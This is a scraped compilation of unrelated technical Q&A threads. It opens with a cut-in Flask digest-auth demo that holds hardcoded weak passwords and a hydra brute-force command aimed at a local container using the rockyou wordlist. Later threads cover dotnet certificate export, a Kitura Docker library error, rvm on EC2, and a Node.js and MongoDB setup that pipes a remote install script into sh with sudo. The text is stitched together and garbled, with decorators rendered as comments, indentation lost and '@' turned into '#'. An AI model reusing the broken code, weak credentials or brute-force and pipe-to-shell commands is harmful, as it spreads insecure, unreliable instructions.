# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
"admin" : "password",
"john" : "hello",
"susan" : "bye"
}
#auth.get_password
def get_pw(username):
if username in users:
return users.get(username)
return None
#app.route("/")
#auth.login_required
def hello_world():
return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.

Exporting https certificate fails with 'dotnet dev-certs' tool

I am trying to use the 'dotnet dev-certs' tool to export an https certificate to include with a Docker image. Right now I am using:
dotnet dev-certs https -v -ep $(HOME)\.aspnet\https -p <password>
and I get the error:
Exporting the certificate including the private key.
Writing exported certificate to path 'xxx\.aspnet\https'.
Failed writing the certificate to the target path
Exception message: Access to the path 'xxx\.aspnet\https' is denied.
An error ocurred exporting the certificate.
Exception message: Access to the path 'xxx\.aspnet\https' is denied.
There was an error exporting HTTPS developer certificate to a file.
The problem I see is that no matter what path I supply to export the certificate to I get the same 'Access to the path is denied' error. What am I missing? I know this command has been suggested in numerous places. But I cannot seem to get it to work.
Thank you.
The export path should specify a file, not a directory. This fixed the issue for me on Mac:
dotnet dev-certs https -v -ep ${HOME}/.aspnet/https/aspnetapp.pfx -p <password>
For Ubuntu users:
install libnss3-tools:
sudo apt-get update -y
sudo apt-get install -y libnss3-tools
create or verify if the folder below exists on machine:
$HOME/.pki/nssdb
export the certificate:
dotnet dev-certs https -v -ep ${HOME}/.aspnet/https/aspnetapp.pfx
Run the following commands:
certutil -d sql:$HOME/.pki/nssdb -A -t "P,," -n localhost -i /home/<REPLACE_WITH_YOUR_USER>/.aspnet/https/aspnetapp.pfx
certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n localhost -i /home/<REPLACE_WITH_YOUR_USER>/.aspnet/https/aspnetapp.pfx
exit and restart the browser
Source: https://learn.microsoft.com/en-us/aspnet/core/security/enforcing-ssl?view=aspnetcore-5.0&tabs=visual-studio#ssl-linux
For me the problem was I was using .Net 5 under CentOS 7.8. Uninstalling .Net 5 and using .Net Core 3.1 SDK instead solved the problem.

Run Kitura Docker Image causes libmysqlclient.so.18 Error

after i had some previous problem to Dockerise my MySQL Kitura SETUP here : Docker Build Kitura Sqift Container - Shim.h mysql.h file not found
I am running in a new Problem i can not solve following the Guide from : https://www.kitura.io/docs/deploying/docker.html .
After i followed all the steps and also did the fixing on the MySQL issue previously i was now able to run the following command :
docker run -p 8080:8080 -it myapp-run
THis however leads to the following issue :
error while loading shared libraries: libmysqlclient.so.18: cannot open shared object file: No such file or directory
i assume something tries again to open the libmysqclclient from some wrong Environmental Directories ?
But how can i fix this issues by building the docker images ... is there any way and better a smart way ?
Thanks a lot again for the help.
I was able to update and enhance my dockerfile this is now running smoothly and also can be used for CI and CD tasks.
FROM ibmcom/swift-ubuntu-runtime:latest
##FROM ibmcom/swift-ubuntu-runtime:5.0.1
LABEL maintainer="IBM Swift Engineering at IBM Cloud"
LABEL Description="Template Dockerfile that extends the ibmcom/swift-ubuntu-runtime image."
# We can replace this port with what the user wants
EXPOSE 8080
# Default user if not provided
ARG bx_dev_user=root
ARG bx_dev_userid=1000
# Install system level packages
RUN apt-get update && apt-get dist-upgrade -y
RUN apt-get update && apt-get install -y sudo libmysqlclient-dev
# Add utils files
ADD https://raw.githubusercontent.com/IBM-Swift/swift-ubuntu-docker/master/utils/run-utils.sh /swift-utils/run-utils.sh
ADD https://raw.githubusercontent.com/IBM-Swift/swift-ubuntu-docker/master/utils/common-utils.sh /swift-utils/common-utils.sh
RUN chmod -R 555 /swift-utils
# Create user if not root
RUN if [ $bx_dev_user != "root" ]; then useradd -ms /bin/bash -u $bx_dev_userid $bx_dev_user; fi
# Bundle application source & binaries
COPY ./.build /swift-project/.build
# Command to start Swift application
CMD [ "sh", "-c", "cd /swift-project && .build/release/Beautylivery_Server_New" ]

AWS EC2 and rvm ssh

I have created user for my AWS ec2 VPS (deployer)
When i am logging with:
ssh -i ~/.ssh/aws/*...*.pem ubuntu#ec2*...*.amazonaws.com
command rvm use 2.0.0 is working correctly
=>
ubuntu#ip-***:~$ rvm list
rvm rubies
=* ruby-2.0.0-p247 [ x86_64 ]
# => - current
# =* - current && default
# * - default
ubuntu#ip-***:~$ rvm which
ubuntu#ip-***:~$
But when i use su - deployer i have got:
deployer#ip***:/home/ubuntu$ rvm
The program 'rvm' is currently not installed. You can install it by typing:
sudo apt-get install ruby-rvm
I would like to understand how correctly write command for ssh login.
I have tried:
ssh -i ~/.ssh/aws/*.pem *ubuntu#ec2***.amazonaws.com -t 'bash --login -c "rvm"'
but received "Connection to ec2-*.amazonaws.com closed".
Within my local machine rvm functioning correctly. I have added
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
into my ~/.bash_profile
I have spent 3-5 hours studying stackoverflow topics related to this issue, but still not understand what am i doing wrong.
Any help will be highly appreciated! Thanks in advance!
I've run into this problem before and there are 2 ways to solve it.
The first way is to log in directly as the deployer user to the instance. This might mean having to create a ssh keypair (see ssh-keygen -t rsa). Then you can log in with ssh deployer#ec2.instance.address This way the rvm will be loaded directly to the deployed user's shell.
A second way is not to use the dash when su to the deployed user account.
When you use the dash then you load your own bashrc vs that particular user's bashrc.
So sudo su deployer
you nee to use:
su - deployer
it will ensure you use login shell

How can I set up MongoDB on a Node.js server using node-mongodb-native in an EC2 environment?

I got help from many people here, and now I want to contribute back. For those who are having trouble making a Node.js server work with MongoDB, here is what I've done.
This was originally posted by the question asker. A mod asked him in the comments to post it as an answer, but got no response. So, I cleaned it up and am posting it myself.
When you look at the code, you will notice that the createServer code is inside db.open. It won't work if you reverse it. Also, do not close the db connection. Otherwise, after the first time, the db connection will not be opened again. (Of course, db.open is declared outside of createServer.) I have no clue why createServer is inside db.open. I guess it may have to do with not opening too many db connections?
Also, one problem I face is that when I run it via SSH, even if I run the server in the background (e.g. $ node server.js &), after 2.5 hours, the server dies (not the instance though). I am not sure if it is because of terminal connection or what.
Here is the procedure & code
Environment: EC2, AMS-Linux-AMI
Purpose: Take an HTTP request and log the query, IP and timestamp into MongoDB.
Steps
1) After creating the instance (server), install gcc.
$ yum install gcc-c++
2) Download Node.js files and unzip them. (I used version 2.6.)
$ curl -O http://nodejs.org/dist/node-v0.2.6.tar.gz
$ tar -xzf node-v0.2.6.tar.gz
I renamed the unzipped folder to just "nodejs"
$ cd nodejs
$ sudo ./configure --without-ssl
$ sudo make
$ sudo make install
make takes a long while.... After that you can try running the sample in nodejs.org
3) Install MongoDB. I installed version 1.6.5, not 1.7.
$ curl -O http://fastdl.mongodb.org/linux/mongodb-linux-x86_64-1.6.5.tgz
$ tar -xzf mongodb-linux-x86_64-1.6.5.tgz
$ sudo mkdir /data/db/r01/
I renamed the folder to "mongodb"
Run the db process:
$ ./mongodb/bin/mongod --dbpath /data/db/r01/
Then if you like, you can run and try out the command line. Refer to MongoDB's website.
4) I recommend that you create your own AIM based on your instance. It will take 20 minutes. Then, recreate the install and run MongoDB again.
5) Install node-mongodb-native
$ curl -O https://download.github.com/christkv-node-mongodb-native-V0.8.1-91-g54525d8.tar.gz
$ tar -xzf christkv-node-mongodb-native-V0.8.1-91-g54525d8.tar.gz
I renamed the folder to node-mongodb-native
$ cd node-mongodb-native
$ make
6) Here is the code for the server:
GLOBAL.DEBUG = true;
global.inData = '';
var http = require('http');
sys = require("sys");
/* set up DB */
var Db = require('./node-mongodb-native/lib/mongodb').Db,
Connection = require('./node-mongodb-native/lib/mongodb').Connection,
Server = require('./node-mongodb-native/lib/mongodb').Server,
BSON = require('./node-mongodb-native/lib/mongodb').BSONNative;
var host = process.env['MONGO_NODE_DRIVER_HOST'] != null ? process.env['MONGO_NODE_DRIVER_HOST'] : 'localhost';
var port = process.env['MONGO_NODE_DRIVER_PORT'] != null ? process.env['MONGO_NODE_DRIVER_PORT'] : Connection.DEFAULT_PORT;
var db = new Db('test01', new Server(host, port, {}), {native_parser:true});
db.open(function(err, db) {
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
global.inData = {'p':'', 'url':''};
// get IP address
var ipAddress = req.connection.remoteAddress;
global.inData.ip = ipAddress;
// date time
var d = new Date();
var ts = d.valueOf();
global.inData.ts = ts;
// get the http query
var qs = {};
qs = require('url').parse(req.url, true);
if (qs.query !== null) {
for (var key in qs.query) {
if (key == 'p') {
global.inData.p = qs.query[key];
}
if (key == 'url') {
global.inData.url = qs.query[key];
}
}
}
if (global.inData.p == '' && global.inData.url == '') {
res.end("");
} else {
db.collection('clickCount', function(err, collection) {
if (err) {
console.log('is error \n' + err);
}
collection.insert({'p':global.inData.p,
'url':global.inData.url,
'ip':global.inData.ip,
'ts':global.inData.ts});
res.end("");
//db.close(); // DO NOT CLOSE THE CONNECTION
});
}
}).listen(8080);
});
console.log('Server running at whatever host :8080');
This may not be perfect code, but it runs. I'm still not used to the "nested" or LISP kind of coding style. That's why I cheated and used global.inData to pass data along. :)
Don't forget to put res.end("") in the appropriate location (where you think the HTTP request call should be ended).
By the way, the answer I posted above works for CentOS and Fedora.
For people who have Ubuntu, here it is:
# for Gcc
$ sudo apt-get install build-essential
# for SSL
$ sudo apt-get install libssl-dev
Then just install node.js and mongodb as described above.
Also, after few months of development, I find out using "npm", "express" and "mongoose" can bring my life much easier. Also, I have installed other tools, like debugger.
# Install Node Package Manager
$ sudo curl http://npmjs.org/install.sh | sh
# for debugging
$ sudo npm install node-inspector
# for Profiling
$ sudo npm install profile
# Install Express, the Node.js framework
$ sudo npm install express
# Install Template Engines (Now, let’s install Jade, jQuery Templates and EJS. You can pick the one you want)
$ sudo npm install jade jqtpl ejs
# XML related, install node-expat and then node-xml2js-expat
$ sudo apt-get install -y libexpat1-dev
$ sudo npm install node-xml2js
$ sudo npm install xml2js-expat
# Install Mongoose, (Mongo Driver)
$ sudo npm install mongoose
Reference:
http://npmjs.org
http://expressjs.com
http://mongoosejs.com
It looks like there might be a bug. It won't allow me to use a var for the first argument in a:b inside collection.insert({
It is treating first agument as 'a' or a, hard coded, either way.
I will look into this and post a fix on github